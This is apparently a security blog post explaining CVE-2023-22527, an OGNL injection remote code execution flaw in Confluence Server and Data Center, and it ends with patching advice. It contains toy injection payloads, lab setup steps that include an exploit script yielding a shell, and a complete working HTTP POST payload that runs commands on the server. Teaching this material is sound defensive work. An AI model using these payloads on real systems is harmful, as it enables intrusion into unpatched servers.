Overview

In the constantly evolving landscape of cybersecurity threats, vulnerabilities in software applications pose significant risks to organizations. A recent addition to the list of concerns is the critical vulnerability—CVE-2023-22527—identified in Atlassian's Confluence Server and Data Center. Originating from the mishandling of Object-Graph Navigation Language (OGNL) expressions, this flaw opens avenues for attackers to inject malicious code into Confluence instances.

‍

This critical flaw, with a CVSS score of 10, signifies the severity and potential impact of the issue. The vulnerability was officially disclosed by Atlassian on January 16, 2024, highlighting the urgency for organizations to address and mitigate this risk. Although patches have been released to address the vulnerability, the prevalence of outdated and publicly exposed Confluence instances raises apprehensions, exposing numerous organizations to potential security breaches.

‍

This blog navigates through the intricacies of the Atlassian Confluence CVE-2023-22527 vulnerability, shedding light on the nature of the exploit and offering insights into effective defense strategies for organizations.

‍

Affected Versions

This Remote Code Execution (RCE) vulnerability impacts Confluence Data Center and Server 8 versions that are outdated and were released prior to December 5, 2023.

‍

About Atlassian's Confluence Server and Data Center

Atlassian's Confluence is a collaboration and documentation tool designed to help teams collaborate and share knowledge. It is particularly popular among businesses and organizations for creating, organizing, and sharing content within a team or across different teams. Confluence allows users to create pages, documents, and spaces, making it a versatile platform for project documentation, meeting notes, knowledge bases, and more. However, the strength of this collaborative tool was recently challenged by the discovery of a critical vulnerability—CVE-2023-22527. 

‍Confluence Server is the self-hosted version of the platform, allowing organizations to have direct control over their instance. On the other hand, Confluence Data Center is designed for larger enterprises, offering high availability, scalability, and enhanced performance through clustering.

‍

OGNL Injection Attack 

OGNL, short for Object-Graph Navigation Language, is a powerful expression language employed in Java applications. With its concise and expressive syntax, it facilitates the navigation and manipulation of object graphs in Java. Commonly utilized in frameworks like Apache Struts and applications such as Atlassian Confluence, OGNL resembles a server-side template. This language enables developers to efficiently access and alter Java object properties dynamically, offering simplicity and expressiveness in the process.

‍

In an OGNL injection attack, an attacker exploits the application's failure to properly validate or sanitize user inputs before they are processed by OGNL expressions. This can lead to the execution of arbitrary code or unintended actions within the application.

‍

Example of OGNL Injection Attack:

Let's consider a simplified example of a vulnerable Apache Struts application where user input is insecurely processed in a search functionality.

public class ProductSearchAction extends ActionSupport {
    private String searchTerm;

    // Getter and Setter for searchTerm

    public String execute() {
        // Insecurely using user input in OGNL expression
        String searchQuery = "productName:" + searchTerm;
        
        // Code to perform the search based on the constructed query
        // ...
        
        return SUCCESS;
    }
}

In this example, the ProductSearchAction class has a searchTerm field that represents user input for product searching. The execute method constructs a search query by directly concatenating the user input into an OGNL expression without proper validation or sanitization.

‍

Legitimate User Input: laptop

Malicious User Input: '+@java.lang.Runtime@getRuntime().exec('calc') + '

‍

If the application does not adequately validate or sanitize user input, the injected expression would modify the search query as follows: 

‍

productName: laptop

productName: '+ @java.lang.Runtime@getRuntime().exec('calc') + '

‍

When the application processes this search query, the injected OGNL expression attempts to execute the Windows Calculator (calc) using the Runtime.exec() method. If successful, this could lead to the unintended execution of the calculator on the server hosting the vulnerable application. If the server is running on a Unix-based system (Linux, macOS, etc.), an attacker might attempt to execute a command that is compatible with that platform. For instance, they might try to execute a shell command like:

' + new java.lang.ProcessBuilder('/bin/sh', '-c', 'ls') + '

‍

In this case, the attacker is attempting to list the files in the directory using the ls command in a Unix-like environment.

‍

Technical Details of CVE-2023-22527

‍

The vulnerability, identified as CVE-2023-22527, is rooted in the Velocity template file "text-inline.vm" within Atlassian's Confluence Server and Data Center. This particular file, found at endpoint /confluence/template/aui/text-inline.vm, allows the label parameter to be passed to a Object-Graph Navigation Language (OGNL) sink.

‍

In the context of Confluence, .vm files serve as Velocity template files. Velocity is a template engine based on Java, enabling developers to specify dynamic content within templates. These templates play a crucial role in dynamically generating HTML pages, typically by combining the templates with data at runtime. The rendering process of Velocity templates in Confluence likely involves the ConfluenceVelocityServlet, which is responsible for receiving and managing requests generated from the browser.

‍

You can analyze the content of "text-inline.vm" to have a clear view. (Note if your lab is on Docker, the file can be found inside: /opt/atlassian/confluence/confluence/template/aui). However, the content of the file has been added below:

#set( $labelValue = $stack.findValue("getText('$parameters.label')") )
#if( !$labelValue )
    #set( $labelValue = $parameters.label )
#end

#if (!$parameters.id)
    #set( $parameters.id = $parameters.name)
#end


$!labelValue
#if($parameters.required)
    
    $parameters.required
#end


#parse("/template/aui/text-include.vm")

The critical point of vulnerability lies in the $stack.findValue("getText('$parameters.label')") function. Any user input from the "label" parameter is directly passed into this function. The input is initially directed to the getText() function, and it was discovered that breaking out of the getText function call leads to OGNL injection, eventually resulting in remote code execution.

‍

An attacker can exploit this by using the expression #request['.KEY_velocity.struts2.context'].internalGet('ognl'). This injection allows the attacker to execute arbitrary commands. 

Playing with CVE-2023-22527

To understand how the exploit works, we need a lab environment. Thanks to https://github.com/Vozec/CVE-2023-22527 for creating a docker-compose file for this purpose. We can use this for our exploitation. Make sure you have docker installed on your machine. 

Download this repository, and execute the following command in the directory containing the docker-compose.yml file: 

                                                                                                    docker-compose up -d

Once the download completes, visit the web page at http://localhost:8092. (Please note that in my configuration, I employed a single machine for the Confluence server and another for the attacker's setup.) It's important to note that the lab setup requires manual intervention. You have to create an account to get a confluence license which is free.  Following this, configure the database using the provided credentials and finally you must create an admin account.

Database name : confluence

Username : postgres

Password: postgres

To exploit the issue we can use the python file that is present on that git repository i.e., CVE-2023-22527. Execute the script with the site address:

‍

$ python3 CVE-2023-22527.py  -u http://localhost:8092 -i

‍

In my case it is:  python3 CVE-2023-22527.py  -u http://192.168.1.46:8092 -i

‍

This provided me with an interactive shell, granting the capability to execute arbitrary commands on the target server. Here's a demonstration of the proof of concept (POC).

However, it can also be exploited using Burp Suite. Visit http://localhost:8092, capture the request with Burp Suite, and send it to the Burp Repeater tab. Replace all the content in the Repeater tab with the following:

POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8092
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 278

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"ls"}))

In this HTTP POST request to /template/aui/text-inline.vm, a malicious payload is injected through the 'label' parameter. The payload employs OGNL (Object-Graph Navigation Language) to trigger remote code execution on the server. The code snippet in the 'x' parameter utilizes the Apache Struts2 framework to execute the 'ls' command, revealing the content of the server's directory.

Mitigation

As outlined by Atlassian, the CVE-2023-22527 vulnerability currently lacks known workarounds. To effectively address this security concern, it is imperative, as recommended by Atlassian, to promptly update each affected product installation to the latest available version. In cases where outdated versions are in use, immediate patching is highly recommended. Ensure comprehensive protection by following Atlassian's explicit guidance to apply the latest patches to each affected installation. It is crucial to acknowledge that the previously listed Fixed Versions may no longer offer the most current protection, exposing instances to potential vulnerabilities highlighted in Atlassian's January Security Bulletin.

References

- https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html

- https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/

- https://github.com/Vozec/CVE-2023-22527

‍